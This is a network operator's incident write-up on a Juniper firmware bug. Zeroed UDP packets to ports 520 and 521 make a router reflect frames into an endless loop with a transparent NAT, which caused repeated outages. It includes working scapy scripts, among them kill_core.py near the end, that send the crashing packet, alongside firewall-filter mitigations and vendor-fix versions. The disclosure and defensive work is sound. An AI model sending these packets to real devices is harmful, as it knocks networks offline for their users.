Tale of the JuRIPer-Bug
Since the beginning of January we’ve had several problems with one of our core routers that seemed related to the outages in September last year. We can now say: this problem has finally been solved.
But let’s start at the beginning. On Friday, September 6th, 2019, the Selfnet core network was completely offline for a few hours. The cause back then was a firmware problem that appeared after we installed our new Juniper EX4600; it could be solved by downgrading to an older version and waiting for another update (see the article Outage RFO for September 6th/7th, 2019).
Before Christmas 2019 we switched to a newer version (after having tested it successfully for some time), as the old version would no longer be maintained. Everything seemed fine, so we mentally marked the problem as solved. But damn, were we wrong…
On Friday (again a Friday…), January 24th, 2020, at around 7:20 AM, the core network broke down completely. Once we noticed and some of our volunteers had arrived on site, we were able to stabilize the network by around 9:30 AM. Since we had installed a new NAT server just the evening before, we assumed something was wrong with it and that it had been overwhelmed by our members’ morning traffic. So we switched to the older backup NAT hardware and set the new machine aside for debugging.
Then we began to notice similarities to the problem observed in September, even though since the software upgrade in December the active user traffic had not been routed via this stack of hardware. So it seemed like we had the same bug all over again.
Meanwhile we collected logs and engaged with our device manufacturer, Juniper, to find a solution.
The main problem with this type of bug is a bit ironic: the router was not completely broken, so the network did not fail over to the redundant hardware. Our network control plane was in a kind of zombie state, half dead and half alive.
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: SCHED: Thread 11 (Ethernet) ran for 1441 ms without yielding
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Scheduler Oinker
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Frame 0: sp = 0x21bc9fa0, pc = 0x8048b2a
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Frame 1: sp = 0x21bc9fb0, pc = 0x80567cf
The device just kept emitting messages like the ones above, with the packet forwarding engine (especially the fxpc process) at 99% CPU utilization, and dumped core images of its software. Then, after a while, it would start working again for a moment, only to break down once more.
We tried switching to an even newer major software version, hoping the bug had been eradicated there. It looked good… for a while.
But then it happened again and again, usually around 4 AM and 8 PM, which was interesting since there was no obvious connection to user traffic peaks. It started from one moment to the next, and then the link between the core and the NAT would be saturated with packets. Furthermore, since the issue caused high CPU load on the affected device, it made debugging difficult and added latency across the whole network, affecting our storage cluster, which in turn degraded performance for most other services (support systems, RADIUS, …).
Further debugging seemed to show that the device’s internal ddos-protection was triggered shortly before each outage. We tried to investigate this but could not conclusively determine what tripped it. So we finally migrated the main traffic to another device and only switched back to the affected device while we were actively debugging it.
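For reference, this is the kind of check that points at a tripped policer. We assume here that the device exposes the standard Junos ddos-protection operational commands (support differs between models and releases):
show ddos-protection protocols violations
show ddos-protection statistics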
While collecting debugging logs we noticed one IP address that sent a lot of traffic to our core router shortly before each outage. We analyzed this traffic and finally found a packet that caused a bridging loop between the NAT server and the core device! The originating IP belonged to Netscout Arbor, a service that scans the entire internet for vulnerabilities and reports them. Well, it seems we found one…
With that information we were even able to reproduce the packet (see below for our script, so you can test it yourself): it is a UDP packet to port 520, the well-known port of the Routing Information Protocol (RIP). We don’t use that protocol and it should not have been active. Our tests showed that port 521 (RIPng) was affected as well. The packet didn’t even have to contain anything but zeroes, so no actual routing information was processed; just receiving the packet caused the problem.
The core router would reply to this incoming packet from the internet with the exact same packet, including the same source and destination MAC addresses, TTL and so on. This confused us, since at least the source and destination MACs should have been rewritten and the TTL decremented. The NAT server would look at the packet returned by the core router and forward it straight back to the core, as the destination MAC was still that of the core device, so it should go there, right? And because the NAT is in transparent mode, it did not decrement the TTL either, so the packet never timed out and bounced between core and NAT forever.
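On the wire such a loop is easy to spot once you know what to look for: the very same frame, with unchanged MAC addresses and TTL, keeps reappearing on the link between core and NAT. Below is a small scapy sketch of that idea; the interface name is a placeholder and this is not the exact tooling we used, just an illustration.
from collections import Counter
from scapy.all import sniff, Ether, IP, UDP

seen = Counter()

def count_repeats(pkt):
    # In a bridging loop the identical frame (same MACs, same TTL, same
    # payload) comes back again and again, so counting exact repeats exposes it.
    if IP in pkt and UDP in pkt and pkt[UDP].dport in (520, 521):
        key = (pkt[Ether].src, pkt[Ether].dst, pkt[IP].ttl, bytes(pkt[UDP].payload))
        seen[key] += 1
        if seen[key] == 100:
            print("possible loop:", key[:3])

# "mon0" is a placeholder for a mirror port on the core/NAT link.
sniff(iface="mon0", filter="udp and (port 520 or port 521)", prn=count_repeats, store=False)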
Example Packet:
<Ether dst=f0:4b:3a:a2:b2:3f src=a8:d0:e5:5c:1b:00 type=0x800
|<IP version=4 ihl=5 tos=0x0 len=52 id=54321 flags= frag=0 ttl=242 proto=udp src=146.88.240.4 dst=141.70.124.114 options=[]
|<UDP sport=55377 dport=521 len=32 chksum=0x0
|<Raw load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>
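For completeness, here is a short scapy sketch that rebuilds the IPv4 variant shown above for lab testing. The MAC addresses, target IP and interface name are documentation placeholders, not our production values; the IPv6 script we actually sent to Juniper follows at the end of this article.
from scapy.all import Ether, IP, UDP, Raw, sendp

SOURCE_MAC = "00:00:5e:00:53:01"   # placeholder: sending host
GATEWAY_MAC = "00:00:5e:00:53:02"  # placeholder: next hop towards the device under test
TARGET = "192.0.2.1"               # placeholder: lab address of the device under test

frame = Ether(
    src=SOURCE_MAC,
    dst=GATEWAY_MAC,
) / IP(
    dst=TARGET,
) / UDP(
    sport=55377,
    dport=521,  # RIPng; port 520 (RIP) triggered the bug as well
    chksum=0x0, # the captured packet carried a zero UDP checksum
) / Raw(
    load="\x00" * 24,  # 24 zero bytes, just like the packet above
)

print(repr(frame))
sendp(frame, iface="eth0")  # placeholder interface name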
We even set up a test lab and confirmed that the problem also occurs on a fresh installation with a minimal configuration. We also experimented with different software release versions and made a discovery: in earlier versions the bug did not occur and the packet was simply ignored by the device (as it should be), but newer versions showed the bug:
- 17.1R3.6 - normal behaviour
- 17.2R3.4 - normal behaviour
- 17.3R3.10 - normal behaviour
- 18.1R2.6 - normal behaviour
- 18.1R3-S8 - bug occurred
- 19.3R2.9 - bug occurred
So the problem seems to have been introduced somewhere after 18.1R2.6 and before 18.1R3-S8, which is a bit of a problem because 18.1R3-S8 was the JTAC recommended version (according to Juniper KB21476 at the time).
Considering that we could trigger it from anywhere on the internet (we tested it from one of our members’ DSL connections), the issue seemed quite serious and could possibly affect many users with transparent firewalls worldwide. We reported our findings, along with our small script (kill_core.py), to Juniper and escalated the issue. We weren’t even sure about the true scope: since Juniper uses a unified operating system across their devices, other models could be affected as well, such as the QFX5100, which uses the same base hardware (?). We could not confirm this, though, as we don’t own any of these devices.
Meanwhile we implemented firewall filters to protect our devices from the bug. It was quite simple, as you just need a filter on the lo0 loopback interface that keeps those UDP packets from reaching the routing engine. After this hotfix the devices worked without a problem… until we discovered that the bug could also be triggered by sending an IPv6 UDP packet to the same ports. We assume it took longer to notice this variant because the IPv6 address space is far larger and Arbor therefore scans it less frequently.
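As an illustration, here is a minimal sketch of such a loopback filter in Junos set-command syntax. The filter and term names are made up for this example; in practice the terms belong in whatever protect-RE filter is already applied to lo0.
# Filter and term names below are placeholders for this sketch.
set firewall family inet filter protect-re term drop-rip from protocol udp
set firewall family inet filter protect-re term drop-rip from destination-port 520-521
set firewall family inet filter protect-re term drop-rip then discard
set firewall family inet filter protect-re term accept-rest then accept
set interfaces lo0 unit 0 family inet filter input protect-re

# The IPv6-triggered variant needs the same treatment under family inet6.
set firewall family inet6 filter protect-re-v6 term drop-rip from next-header udp
set firewall family inet6 filter protect-re-v6 term drop-rip from destination-port 520-521
set firewall family inet6 filter protect-re-v6 term drop-rip then discard
set firewall family inet6 filter protect-re-v6 term accept-rest then accept
set interfaces lo0 unit 0 family inet6 filter input protect-re-v6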
Since then we have also changed the configuration of our NAT/transparent firewall setup so that it always rewrites the source MAC on outgoing packets, which should prevent floods like this one in the future.
After some time we received confirmation that Juniper’s labs were able to reproduce the bug, but the information regarding the trigger and root cause is confidential and could not be disclosed to us. Nevertheless, JTAC is now informed and can help customers who report similar problems. Juniper also told us that a new software version fixing the bug will be released in May 2020.
According to Juniper the following versions should have the issue fixed:
- 18.4R1-S5
- 18.4R3
- 19.2R2
- 19.3R3
- 19.4R2
- 18.3R3-S1
- 18.2R3-S3
- 17.3R3-S7
- 18.1R3-S9
- 18.4R2-S3
- 19.1R3
- 19.1R2-S1
- 20.1DCB
- 18.1R3-S10
Thanks to all of our members who helped in any way to solve this problem. We also apologize to all users of our network, as it was not particularly stable while we were tracking down and debugging the bug.
Do you want to help take care of problems like this in the future? For our network to run smoothly there are a lot of different things to do: managing the equipment (including buying new hardware and getting vendor service), taking care of the servers for the network and additional services, debugging problems like this one, or connecting new dormitories to our network.
If you want to volunteer, it doesn’t matter whether you are a pro or a beginner: Selfnet offers the opportunity to learn everything required. If you are interested in technical topics, programming, public relations, project management or anything else, we would be glad to welcome you to our team! Just visit our support hours (once the office hours are re-opened).
The Selfnet-Team
kill_core.py
from scapy.all import Ether, IPv6, UDP, Raw, sendp
SOURCE_MAC = "00:80:41:33:05:04" # my laptop at home (where I sent the packet from)
SOURCE_ADDR = "2001:db8::beef" # my laptop's address as source
SOURCE_INTF = "wlp3s0" # wifi...
GATEWAY_MAC = "00:80:41:18:5b:0e" # my crappy wifi router
TARGET = "2001:db8::affe" # our juniper box as the target
frame = Ether(
    src=SOURCE_MAC,
    dst=GATEWAY_MAC,
    type=0x86dd,
) / IPv6(
    version=6,
    src=SOURCE_ADDR,
    dst=TARGET,
) / UDP(
    sport=55377,
    dport=520,  # RIP
    len=32,
    chksum=0x0,
) / Raw(
    load="\x00" * 24,
)
print(repr(frame))
sendp(frame, iface=SOURCE_INTF)